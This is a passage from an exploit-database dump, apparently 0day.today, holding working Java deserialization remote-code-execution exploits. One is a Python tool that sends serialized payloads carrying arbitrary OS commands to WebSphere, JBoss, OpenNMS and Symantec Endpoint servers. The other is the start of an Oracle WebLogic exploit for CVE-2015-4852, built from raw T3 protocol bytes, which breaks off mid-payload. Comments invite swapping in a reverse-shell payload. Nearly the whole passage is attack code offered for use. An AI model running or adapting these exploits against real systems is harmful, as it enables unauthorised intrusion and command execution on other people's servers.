Revert to manual attack.\")\r\n return 0\r\n \r\ndef jboss_attack(HOST, PORT, SSL_On, _cmd):\r\n # The below code is based on the jboss_java_serialize.nasl script within Nessus \r\n \"\"\"\r\n This function sets up the attack payload for JBoss\r\n \"\"\"\r\n body_serObj = hex2raw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r\n \r\n cleng = len(_cmd)\r\n body_serObj += chr(cleng) + _cmd\r\n body_serObj += hex2raw3(\"740004657865637571007E001E0000000171007E00237371007E0011737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F40000000000010770800000010000000007878767200126A6176612E6C616E672E4F766572726964650000000000000000000000787071007E003A\")\r\n \r\n if SSL_On:\r\n webservice = httplib2.Http(disable_ssl_certificate_validation=True)\r\n URL_ADDR = \"%s://%s:%s\" % ('https',HOST,PORT)\r\n else:\r\n webservice = httplib2.Http()\r\n URL_ADDR = \"%s://%s:%s\" % ('http',HOST,PORT)\r\n headers = {\"User-Agent\":\"JBoss_RCE_POC\",\r\n \"Content-type\":\"application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue\",\r\n \"Content-length\":\"%d\" % len(body_serObj)\r\n }\r\n resp, content = webservice.request(URL_ADDR+\"/invoker/JMXInvokerServlet\", \"POST\", body=body_serObj, headers=headers)\r\n # print provided response.\r\n print(\"[i] Response received from target: %s\" % resp)\r\n \r\ndef websphere_attack(HOST, PORT, SSL_On, _cmd):\r\n # The below code is based on the websphere_java_serialize.nasl script within Nessus\r\n \"\"\"\r\n This function sets up the attack payload for IBM WebSphere\r\n \"\"\"\r\n serObj3 = hex2raw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etup initial parts of the payload packet\r\n cleng = len(_cmd) # Get the length of the payload\r\n serObj3 += chr(cleng) + _cmd # Convert the length to 
byte string, prepend to the payload and concatenate with the serialised payload.\r\n serObj3 += hex2raw3(\"740004657865637571007E001E0000000171007E00237371007E0011737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F40000000000010770800000010000000007878767200126A6176612E6C616E672E4F766572726964650000000000000000000000787071007E003A\") # Complete the payload packet\r\n serObjB64_3 = base64.b64encode(serObj3.encode('ascii', errors='ignore')) # Base64 encode the whole payload\r\n \r\n body = \"\"\"<?xml version='1.0' encoding='UTF-8'?>\r\n <SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\">\r\n <SOAP-ENV:Header ns0:JMXConnectorContext=\"rO0ABXNyAA9qYXZhLnV0aWwuU3RhY2sQ/irCuwmGHQIAAHhyABBqYXZhLnV0aWwuVmVjdG9y2Zd9W4A7rwEDAANJABFjYXBhY2l0eUluY3JlbWVudEkADGVsZW1lbnRDb3VudFsAC2VsZW1lbnREYXRhdAATW0xqYXZhL2xhbmcvT2JqZWN0O3hwAAAAAAAAAAF1cgATW0xqYXZhLmxhbmcuT2JqZWN0O5DOWJ8QcylsAgAAeHAAAAAKc3IAOmNvbS5pYm0ud3MubWFuYWdlbWVudC5jb25uZWN0b3IuSk1YQ29ubmVjdG9yQ29udGV4dEVsZW1lbnTblRMyYyF8sQIABUwACGNlbGxOYW1ldAASTGphdmEvbGFuZy9TdHJpbmc7TAAIaG9zdE5hbWVxAH4AB0wACG5vZGVOYW1lcQB+AAdMAApzZXJ2ZXJOYW1lcQB+AAdbAApzdGFja1RyYWNldAAeW0xqYXZhL2xhbmcvU3RhY2tUcmFjZUVsZW1lbnQ7eHB0AAB0AAhMYXAzOTAxM3EAfgAKcQB+AAp1cgAeW0xqYXZhLmxhbmcuU3RhY2tUcmFjZUVsZW1lbnQ7AkYqPDz9IjkCAAB4cAAAACpzcgAbamF2YS5sYW5nLlN0YWNrVHJhY2VFbGVtZW50YQnFmiY23YUCAARJAApsaW5lTnVtYmVyTAAOZGVjbGFyaW5nQ2xhc3NxAH4AB0wACGZpbGVOYW1lcQB+AAdMAAptZXRob2ROYW1lcQB+AAd4cAAAAEt0ADpjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLkpNWENvbm5lY3RvckNvbnRleHRFbGVtZW50dAAfSk1YQ29ubmVjdG9yQ29udGV4dEVsZW1lbnQuamF2YXQABjxpbml0PnNxAH4ADgAAADx0ADNjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLkpNWENvbm5lY3RvckNvbnRleHR0ABhK
TVhDb25uZWN0b3JDb250ZXh0LmphdmF0AARwdXNoc3EAfgAOAAAGQ3QAOGNvbS5pYm0ud3MubWFuYWdlbWVudC5jb25uZWN0b3Iuc29hcC5TT0FQQ29ubmVjdG9yQ2xpZW50dAAYU09BUENvbm5lY3RvckNsaWVudC5qYXZhdAAcZ2V0Sk1YQ29ubmVjdG9yQ29udGV4dEhlYWRlcnNxAH4ADgAAA0h0ADhjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLnNvYXAuU09BUENvbm5lY3RvckNsaWVudHQAGFNPQVBDb25uZWN0b3JDbGllbnQuamF2YXQAEmludm9rZVRlbXBsYXRlT25jZXNxAH4ADgAAArF0ADhjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLnNvYXAuU09BUENvbm5lY3RvckNsaWVudHQAGFNPQVBDb25uZWN0b3JDbGllbnQuamF2YXQADmludm9rZVRlbXBsYXRlc3EAfgAOAAACp3QAOGNvbS5pYm0ud3MubWFuYWdlbWVudC5jb25uZWN0b3Iuc29hcC5TT0FQQ29ubmVjdG9yQ2xpZW50dAAYU09BUENvbm5lY3RvckNsaWVudC5qYXZhdAAOaW52b2tlVGVtcGxhdGVzcQB+AA4AAAKZdAA4Y29tLmlibS53cy5tYW5hZ2VtZW50LmNvbm5lY3Rvci5zb2FwLlNPQVBDb25uZWN0b3JDbGllbnR0ABhTT0FQQ29ubmVjdG9yQ2xpZW50LmphdmF0AAZpbnZva2VzcQB+AA4AAAHndAA4Y29tLmlibS53cy5tYW5hZ2VtZW50LmNvbm5lY3Rvci5zb2FwLlNPQVBDb25uZWN0b3JDbGllbnR0ABhTT0FQQ29ubmVjdG9yQ2xpZW50LmphdmF0AAZpbnZva2VzcQB+AA7/////dAAVY29tLnN1bi5wcm94eS4kUHJveHkwcHQABmludm9rZXNxAH4ADgAAAOB0ACVjb20uaWJtLndzLm1hbmFnZW1lbnQuQWRtaW5DbGllbnRJbXBsdAAUQWRtaW5DbGllbnRJbXBsLmphdmF0AAZpbnZva2VzcQB+AA4AAADYdAA9Y29tLmlibS53ZWJzcGhlcmUubWFuYWdlbWVudC5jb25maWdzZXJ2aWNlLkNvbmZpZ1NlcnZpY2VQcm94eXQAF0NvbmZpZ1NlcnZpY2VQcm94eS5qYXZhdAARZ2V0VW5zYXZlZENoYW5nZXNzcQB+AA4AAAwYdAAmY29tLmlibS53cy5zY3JpcHRpbmcuQWRtaW5Db25maWdDbGllbnR0ABZBZG1pbkNvbmZpZ0NsaWVudC5qYXZhdAAKaGFzQ2hhbmdlc3NxAH4ADgAAA/Z0AB5jb20uaWJtLndzLnNjcmlwdGluZy5XYXN4U2hlbGx0AA5XYXN4U2hlbGwuamF2YXQACHRpbWVUb0dvc3EAfgAOAAAFm3QAImNvbS5pYm0ud3Muc2NyaXB0aW5nLkFic3RyYWN0U2hlbGx0ABJBYnN0cmFjdFNoZWxsLmphdmF0AAtpbnRlcmFjdGl2ZXNxAH4ADgAACPp0ACJjb20uaWJtLndzLnNjcmlwdGluZy5BYnN0cmFjdFNoZWxsdAASQWJzdHJhY3RTaGVsbC5qYXZhdAADcnVuc3EAfgAOAAAElHQAHmNvbS5pYm0ud3Muc2NyaXB0aW5nLldhc3hTaGVsbHQADldhc3hTaGVsbC5qYXZhdAAEbWFpbnNxAH4ADv////50ACRzdW4ucmVmbGVjdC5OYXRpdmVNZXRob2RBY2Nlc3NvckltcGx0AB1OYXRpdmVNZXRob2RBY2Nlc3NvckltcGwuamF2YXQAB2ludm9rZTBzcQB+AA4AAAA8dAAkc3VuLnJlZmxlY3QuTmF0aXZlTWV0aG9kQWNjZXNzb3JJbXBsdAAdTmF0aXZlTWV0aG9kQWNjZXNz
b3JJbXBsLmphdmF0AAZpbnZva2VzcQB+AA4AAAAldAAoc3VuLnJlZmxlY3QuRGVsZWdhdGluZ01ldGhvZEFjY2Vzc29ySW1wbHQAIURlbGVnYXRpbmdNZXRob2RBY2Nlc3NvckltcGwuamF2YXQABmludm9rZXNxAH4ADgAAAmN0ABhqYXZhLmxhbmcucmVmbGVjdC5NZXRob2R0AAtNZXRob2QuamF2YXQABmludm9rZXNxAH4ADgAAAOp0ACJjb20uaWJtLndzc3BpLmJvb3RzdHJhcC5XU0xhdW5jaGVydAAPV1NMYXVuY2hlci5qYXZhdAAKbGF1bmNoTWFpbnNxAH4ADgAAAGB0ACJjb20uaWJtLndzc3BpLmJvb3RzdHJhcC5XU0xhdW5jaGVydAAPV1NMYXVuY2hlci5qYXZhdAAEbWFpbnNxAH4ADgAAAE10ACJjb20uaWJtLndzc3BpLmJvb3RzdHJhcC5XU0xhdW5jaGVydAAPV1NMYXVuY2hlci5qYXZhdAADcnVuc3EAfgAO/////nQAJHN1bi5yZWZsZWN0Lk5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbHQAHU5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAHaW52b2tlMHNxAH4ADgAAADx0ACRzdW4ucmVmbGVjdC5OYXRpdmVNZXRob2RBY2Nlc3NvckltcGx0AB1OYXRpdmVNZXRob2RBY2Nlc3NvckltcGwuamF2YXQABmludm9rZXNxAH4ADgAAACV0AChzdW4ucmVmbGVjdC5EZWxlZ2F0aW5nTWV0aG9kQWNjZXNzb3JJbXBsdAAhRGVsZWdhdGluZ01ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAGaW52b2tlc3EAfgAOAAACY3QAGGphdmEubGFuZy5yZWZsZWN0Lk1ldGhvZHQAC01ldGhvZC5qYXZhdAAGaW52b2tlc3EAfgAOAAACS3QANG9yZy5lY2xpcHNlLmVxdWlub3guaW50ZXJuYWwuYXBwLkVjbGlwc2VBcHBDb250YWluZXJ0ABhFY2xpcHNlQXBwQ29udGFpbmVyLmphdmF0ABdjYWxsTWV0aG9kV2l0aEV4Y2VwdGlvbnNxAH4ADgAAAMZ0ADFvcmcuZWNsaXBzZS5lcXVpbm94LmludGVybmFsLmFwcC5FY2xpcHNlQXBwSGFuZGxldAAVRWNsaXBzZUFwcEhhbmRsZS5qYXZhdAADcnVuc3EAfgAOAAAAbnQAPG9yZy5lY2xpcHNlLmNvcmUucnVudGltZS5pbnRlcm5hbC5hZGFwdG9yLkVjbGlwc2VBcHBMYXVuY2hlcnQAF0VjbGlwc2VBcHBMYXVuY2hlci5qYXZhdAAOcnVuQXBwbGljYXRpb25zcQB+AA4AAABPdAA8b3JnLmVjbGlwc2UuY29yZS5ydW50aW1lLmludGVybmFsLmFkYXB0b3IuRWNsaXBzZUFwcExhdW5jaGVydAAXRWNsaXBzZUFwcExhdW5jaGVyLmphdmF0AAVzdGFydHNxAH4ADgAAAXF0AC9vcmcuZWNsaXBzZS5jb3JlLnJ1bnRpbWUuYWRhcHRvci5FY2xpcHNlU3RhcnRlcnQAE0VjbGlwc2VTdGFydGVyLmphdmF0AANydW5zcQB+AA4AAACzdAAvb3JnLmVjbGlwc2UuY29yZS5ydW50aW1lLmFkYXB0b3IuRWNsaXBzZVN0YXJ0ZXJ0ABNFY2xpcHNlU3RhcnRlci5qYXZhdAADcnVuc3EAfgAO/////nQAJHN1bi5yZWZsZWN0Lk5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbHQAHU5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAHaW52b2tlMHNxAH4ADgAAADx0ACRzdW4ucmVmbGVjdC5OYXRpdmVNZXRob2RBY2Nlc3NvckltcGx0AB1OYXRpdmVNZXRo
b2RBY2Nlc3NvckltcGwuamF2YXQABmludm9rZXNxAH4ADgAAACV0AChzdW4ucmVmbGVjdC5EZWxlZ2F0aW5nTWV0aG9kQWNjZXNzb3JJbXBsdAAhRGVsZWdhdGluZ01ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAGaW52b2tlc3EAfgAOAAACY3QAGGphdmEubGFuZy5yZWZsZWN0Lk1ldGhvZHQAC01ldGhvZC5qYXZhdAAGaW52b2tlc3EAfgAOAAABVHQAHm9yZy5lY2xpcHNlLmNvcmUubGF1bmNoZXIuTWFpbnQACU1haW4uamF2YXQAD2ludm9rZUZyYW1ld29ya3NxAH4ADgAAARp0AB5vcmcuZWNsaXBzZS5jb3JlLmxhdW5jaGVyLk1haW50AAlNYWluLmphdmF0AAhiYXNpY1J1bnNxAH4ADgAAA9V0AB5vcmcuZWNsaXBzZS5jb3JlLmxhdW5jaGVyLk1haW50AAlNYWluLmphdmF0AANydW5zcQB+AA4AAAGQdAAlY29tLmlibS53c3NwaS5ib290c3RyYXAuV1NQcmVMYXVuY2hlcnQAEldTUHJlTGF1bmNoZXIuamF2YXQADWxhdW5jaEVjbGlwc2VzcQB+AA4AAACjdAAlY29tLmlibS53c3NwaS5ib290c3RyYXAuV1NQcmVMYXVuY2hlcnQAEldTUHJlTGF1bmNoZXIuamF2YXQABG1haW5wcHBwcHBwcHB4\" xmlns:ns0=\"admin\" ns0:WASRemoteRuntimeVersion=\"8.5.5.7\" ns0:JMXMessageVersion=\"1.2.0\" ns0:JMXVersion=\"1.2.0\">\r\n </SOAP-ENV:Header>\r\n <SOAP-ENV:Body>\r\n <ns1:invoke xmlns:ns1=\"urn:AdminService\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\r\n <objectname xsi:type=\"ns1:javax.management.ObjectName\">rO0ABXNyABtqYXZheC5tYW5hZ2VtZW50Lk9iamVjdE5hbWUPA6cb620VzwMAAHhwdACxV2ViU3BoZXJlOm5hbWU9Q29uZmlnU2VydmljZSxwcm9jZXNzPXNlcnZlcjEscGxhdGZvcm09cHJveHksbm9kZT1MYXAzOTAxM05vZGUwMSx2ZXJzaW9uPTguNS41LjcsdHlwZT1Db25maWdTZXJ2aWNlLG1iZWFuSWRlbnRpZmllcj1Db25maWdTZXJ2aWNlLGNlbGw9TGFwMzkwMTNOb2RlMDFDZWxsLHNwZWM9MS4weA==</objectname>\r\n <operationname xsi:type=\"xsd:string\">getUnsavedChanges</operationname>\r\n <params xsi:type=\"ns1:[Ljava.lang.Object;\">%s</params>\r\n <signature xsi:type=\"ns1:[Ljava.lang.String;\">rO0ABXVyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0ACRjb20uaWJtLndlYnNwaGVyZS5tYW5hZ2VtZW50LlNlc3Npb24=</signature>\r\n </ns1:invoke>\r\n </SOAP-ENV:Body>\r\n </SOAP-ENV:Envelope>\"\"\" % serObjB64_3 # Append the payload to the request body.\r\n \r\n if SSL_On:\r\n webservice = httplib2.Http(disable_ssl_certificate_validation=True)\r\n URL_ADDR = \"%s://%s:%s\" % 
('https',HOST,PORT)\r\n else:\r\n webservice = httplib2.Http()\r\n URL_ADDR = \"%s://%s:%s\" % ('http',HOST,PORT)\r\n headers = {\"User-Agent\":\"WebSphere_RCE_POC\",\r\n \"Content-type\":\"text/xml; charset=\\\"UTF-8\\\"\",\r\n \"SOAPAction\":\"\\\"urn:AdminService\\\"\",\r\n \"Content-length\":\"%d\" % len(body)\r\n }\r\n print(\"[i] Sending attack payload to %s\" % URL_ADDR)\r\n resp, content = webservice.request(URL_ADDR+\"/\", \"POST\", body=body, headers=headers)\r\n # print provided response.\r\n print(\"[i] Response received from target: %s\" % resp)\r\n \r\nif __name__ == \"__main__\":\r\n \r\n #\r\n # Main function\r\n #\r\n if not sys.version_info >= (3, 0):\r\n sys,exit(\"[x] WARNING - this script requires Python 3.x. Exiting\")\r\n \r\n # Setup command line arguments\r\n cmdparser = argparse.ArgumentParser(prog=\"serialator\", usage=\"\"\"\r\n ____ _ _ _ \r\n / ___| ___ _ __(_) __ _| | __ _| |_ ___ _ __ \r\n \\___ \\ / _ \\ '__| |/ _` | |/ _` | __/ _ \\| '__|\r\n ___) | __/ | | | (_| | | (_| | || (_) | | \r\n |____/ \\___|_| |_|\\__,_|_|\\__,_|\\__\\___/|_|\r\n by Nikhil Sreekumar (@roo7break) v {version}\r\n \r\n Usage: python3 %(prog)s [options]\r\n \r\n Options:\r\n -t Target (required)\r\n -p Port (required)\r\n -c CMD (required)\r\n --serv Target Service (default: websphere)\r\n --ssl Use SSL (default: OFF)\r\n --test Test if target is vulnerable (default: OFF)\r\n \"\"\".format(version=version), formatter_class=argparse.RawTextHelpFormatter)\r\n cmdparser.add_argument(\"-t\", \"--target\", default=\"127.0.0.1\", help=\"Target host\", required=True)\r\n cmdparser.add_argument(\"-p\", \"--port\", default=\"\", type=int, help=\"Target port\", required=True)\r\n cmdparser.add_argument(\"-c\", \"--cmd\", default=\"\", help=\"OS command to execute\")\r\n cmdparser.add_argument(\"--serv\", default=\"websphere\", choices=[\"websphere\", \"opennms\", \"jboss\",\"symantec\"])\r\n cmdparser.add_argument(\"--ssl\", action=\"store_true\", help=\"Use SSL for 
target service\")\r\n cmdparser.add_argument(\"--test\", action=\"store_true\", help=\"Use to test for vulnerability\")\r\n \r\n cmdargs = cmdparser.parse_args()\r\n \r\n if cmdargs.test:\r\n answ = input(\"[i] Before we start, I highly recommend you start Wireshark (filter: icmp.type == 8) or ICMPListener, now. Ready? (y/yes) \")\r\n if answ.lower() == 'y' or answ.lower() == 'yes':\r\n print(\"[i] Awesome. Lets ask the target server to ping our system\")\r\n tgtos = input(\"[?] What do you think the target OS is (win/unix): \")\r\n if tgtos.lower == \"win\":\r\n host_ip = input(\"[?] Provide LHOST: \")\r\n print(\"[i] Windows target selected. Sending \\'ping -n 5 <attack_ip>'\\ to target.\")\r\n cmdargs.cmd == \"ping -n 5 %s\" % host_ip\r\n else:\r\n host_ip = input(\"[?] Provide LHOST: \")\r\n print(\"[i] Unix target selected. Sending \\'ping -c 5 <attack_ip>'\\ to target.\")\r\n cmdargs.cmd == \"ping -n 5 %s\" % host_ip\r\n else:\r\n print(\"[i] Lazy bugger.. right, I am gonna continue anyway.\")\r\n \r\n if cmdargs.serv == \"websphere\":\r\n print(\"[i] WebSphere selected as target app.\")\r\n if cmdargs.test:\r\n websphere_attack(cmdargs.target, cmdargs.port, cmdargs.ssl, cmdargs.cmd)\r\n else:\r\n if cmdargs.cmd == None:\r\n sys.exit(\"[x] You didnt provide any command to run. Exiting..\")\r\n websphere_attack(cmdargs.target, cmdargs.port, cmdargs.ssl, cmdargs.cmd)\r\n elif cmdargs.serv == \"opennms\":\r\n print(\"[i] OpenNMS selected as target app.\")\r\n if cmdargs.test:\r\n opennms_attack(cmdargs.target, cmdargs.port, cmdargs.cmd)\r\n else:\r\n if cmdargs.cmd == None:\r\n sys.exit(\"[x] You didnt provide any command to run. 
Exiting..\")\r\n opennms_attack(cmdargs.target, cmdargs.port, cmdargs.cmd)\r\n elif cmdargs.serv == \"jboss\":\r\n print(\"[i] JBoss selected as target app.\")\r\n if cmdargs.test:\r\n jboss_attack(cmdargs.target, cmdargs.port, cmdargs.ssl, cmdargs.cmd)\r\n else:\r\n if cmdargs.cmd == None:\r\n sys.exit(\"[x] You didnt provide any command to run. Exiting..\")\r\n jboss_attack(cmdargs.target, cmdargs.port, cmdargs.ssl, cmdargs.cmd)\r\n else:\r\n print(\"[i] Symantec Endpoint selected as target app.\")\r\n if cmdargs.test:\r\n symantec_endpoint_attack(cmdargs.target, cmdargs.port, cmdargs.ssl, cmdargs.cmd)\r\n else:\r\n if cmdargs.cmd == None:\r\n sys.exit(\"[x] You didnt provide any command to run. Exiting..\")\r\n symantec_endpoint_attack(cmdargs.target, cmdargs.port, cmdargs.ssl, cmdargs.cmd)\r\n \r\n print(\"[i] Thank you for using this tool. Contact author for any comments.\")\n\n# 0day.today [2018-04-30] #", "sourceHref": "https://0day.today/exploit/30269", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-02T05:07:52", "description": "Exploit for java platform in category remote exploits", "cvss3": {}, "published": "2017-09-28T00:00:00", "type": "zdt", "title": "Oracle WebLogic Server 10.3.6.0 - Java Deserialization Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-4852"], "modified": "2017-09-28T00:00:00", "id": "1337DAY-ID-28661", "href": "https://0day.today/exploit/description/28661", "sourceData": "# Exploit Title: [Oracle WebLogic Server Java Deserialization Remote Code Execution]\r\n# Date: [27/09/2017]\r\n# Exploit Author: [SlidingWindow] , Twitter: @kapil_khot\r\n# Vulnerability Author: FoxGloveSecurity\r\n# Vendor Homepage: [http://www.oracle.com/technetwork/middleware/weblogic/overview/index.html]\r\n# Affetcted Versions: [Oracle WebLogic Server, versions 10.3.6.0, 12.1.2.0, 12.1.3.0 and 12.2.1.0]\r\n# Tested on: [Oracle WebLogic Server version 10.3.6.0 running 
on a Docker image Ubuntu 14.04.4 LTS, Trusty Tahr]\r\n# CVE : [CVE-2015-4852]\r\n \r\n'''\r\nThis exploit tests the target Oracle WebLogic Server for Java Deserialization RCE vulnerability. The ysoserial payload causes the target to send\r\nPing requests to attacking machine. You can monitor ICMP ECHO requests on your attacking machine using TCPDump to know if the exploit was successful.\r\nFeel free to modify the payload(chunk2) with that of your choice. Don't worry about modiyfing the payload length each time you change the payload as \r\nthis script will do it for you on the fly.\r\n \r\nNote: I tried to get a bash one liner reverse shell payload working but that did not work on my target for some reason. Please let me know if you get it working :)\r\n'''\r\n \r\n#!/usr/bin/env python\r\nimport socket\r\nimport sys\r\nimport struct\r\nfrom binascii import unhexlify\r\n \r\nprint \"\\n[+]Hope you've started monitoring ICMP ECHO requests on your attacking machine before running this exploit...\"\r\nprint \"[+]Here is the command:\\n\\t tcpdump -nni <eth-adapter> -e icmp[icmptype] == 8\\n\"\r\n \r\nif len(sys.argv) < 2:\r\n print \"\\n[+]Please provide target IP and Port...\"\r\n print \"[+]Usage:\\n\\t ./weblogic_linuxPing.py <target_ip> <target_port>\"\r\n sys.exit()\r\n \r\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nserver_address = (sys.argv[1], int(sys.argv[2]))\r\nprint '[+]Connecting to %s port %s' % server_address\r\nsock.connect(server_address)\r\n \r\n#Send headers\r\nheaders='t3 12.2.1\\nAS:255\\nHL:19\\nMS:10000000\\nPU:t3://us-l-breens:7001\\n\\n'\r\nprint '[+]Sending\\n\"%s\"' % headers\r\nsock.sendall(headers)\r\n \r\ndata = sock.recv(1024)\r\nprint >>sys.stderr, '\\n[+]Received \"%s\"' % data\r\n \r\n \r\n#00000b4d (2893 bytes in decimal) is the TOTAL length of the payload(all chunks) that includes ysoserial payload.\r\n#We will calculate the TOTAL length of payload (first four bytes in 'chunk1') later as using different ysoserial 
payload changes the length\r\nchunk1='\\x00\\x00\\x0b\\x4d\\x01\\x65\\x01\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x00\\x00\\x00\\x71\\x00\\x00\\xea\\x60\\x00\\x00\\x00\\x18\\x43\\x2e\\xc6\\xa2\\xa6\\x39\\x85\\xb5\\xaf\\x7d\\x63\\xe6\\x43\\x83\\xf4\\x2a\\x6d\\x92\\xc9\\xe9\\xaf\\x0f\\x94\\x72\\x02\\x79\\x73\\x72\\x00\\x78\\x72\\x01\\x78\\x72\\x02\\x78\\x70\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x70\\x70\\x70\\x70\\x70\\x70\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x70\\x06\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x1d\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x43\\x6c\\x61\\x73\\x73\\x54\\x61\\x62\\x6c\\x65\\x45\\x6e\\x74\\x72\\x79\\x2f\\x52\\x65\\x81\\x57\\xf4\\xf9\\xed\\x0c\\x00\\x00\\x78\\x70\\x72\\x00\\x24\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2e\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2e\\x50\\x61\\x63\\x6b\\x61\\x67\\x65\\x49\\x6e\\x66\\x6f\\xe6\\xf7\\x23\\xe7\\xb8\\xae\\x1e\\xc9\\x02\\x00\\x09\\x49\\x00\\x05\\x6d\\x61\\x6a\\x6f\\x72\\x49\\x00\\x05\\x6d\\x69\\x6e\\x6f\\x72\\x49\\x00\\x0b\\x70\\x61\\x74\\x63\\x68\\x55\\x70\\x64\\x61\\x74\\x65\\x49\\x00\\x0c\\x72\\x6f\\x6c\\x6c\\x69\\x6e\\x67\\x50\\x61\\x74\\x63\\x68\\x49\\x00\\x0b\\x73\\x65\\x72\\x76\\x69\\x63\\x65\\x50\\x61\\x63\\x6b\\x5a\\x00\\x0e\\x74\\x65\\x6d\\x70\\x6f\\x72\\x61\\x72\\x79\\x50\\x61\\x74\\x63\\x68\\x4c\\x00\\x09\\x69\\x6d\\x70\\x6c\\x54\\x69\\x74\\x6c\\x65\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x4c\\x00\\x0a\\x69\\x6d\\x70\\x6c\\x56\\x65\\x6e\\x64\\x6f\\x72\\x71\\x00\\x7e\\x00\\x03\\x4c\\x00\\x0b\\x69\\x6d\\x70\\x6c\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x71\\x00\\x7e\\x00\\x03\\x78\\x70\\x77\\x02\\x00\\x00\\x78\\xfe\\x01\\x00\\x00'\r\n \r\n \r\n#java -jar ysoserial-v0.0.4.jar CommonsCollections1 'ping -c 4 
10.40.1.39' | xxd > yso.out\r\n#len(payload) is xxxx bytes\r\n#10.40.1.39 is the attacking IP in this case. Attacking IP should get ICMP Echo Request from the target.\r\n#This is the actual payload that pings back to attacking macine, this is Chunk#2 in the Payload.\r\n \r\n#Feel free to change this to a payload of your choice. I could not get a one liner BASH reverse shell working on my target but please let me know if you do :)\r\nchunk2 = \"\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x32\\x73\\x75\\x6e\\x2e\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2e\\x61\\x6e\\x6e\\x6f\\x74\\x61\\x74\\x69\\x6f\\x6e\\x2e\\x41\\x6e\\x6e\\x6f\\x74\\x61\\x74\\x69\\x6f\\x6e\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x55\\xca\\xf5\\x0f\\x15\\xcb\\x7e\\xa5\\x02\\x00\\x02\\x4c\\x00\\x0c\\x6d\\x65\\x6d\\x62\\x65\\x72\\x56\\x61\\x6c\\x75\\x65\\x73\\x74\\x00\\x0f\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x75\\x74\\x69\\x6c\\x2f\\x4d\\x61\\x70\\x3b\\x4c\\x00\\x04\\x74\\x79\\x70\\x65\\x74\\x00\\x11\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x43\\x6c\\x61\\x73\\x73\\x3b\\x78\\x70\\x73\\x7d\\x00\\x00\\x00\\x01\\x00\\x0d\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x4d\\x61\\x70\\x78\\x72\\x00\\x17\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2e\\x50\\x72\\x6f\\x78\\x79\\xe1\\x27\\xda\\x20\\xcc\\x10\\x43\\xcb\\x02\\x00\\x01\\x4c\\x00\\x01\\x68\\x74\\x00\\x25\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2f\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x3b\\x78\\x70\\x73\\x71\\x00\\x7e\\x00\\x00\\x73\\x72\\x00\\x2a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x6d\\x61\\x70\\x2e\\x4c\\x61\\x7a\\x79\\x4d\\x61\\x70\\x6e\\xe5\\x94\\x82\\x9e\\x79\\x10\\x94\\x03\\x00\\x01\\x4c\\x00\\x07\\x66\\x61\\x63\\x74\\x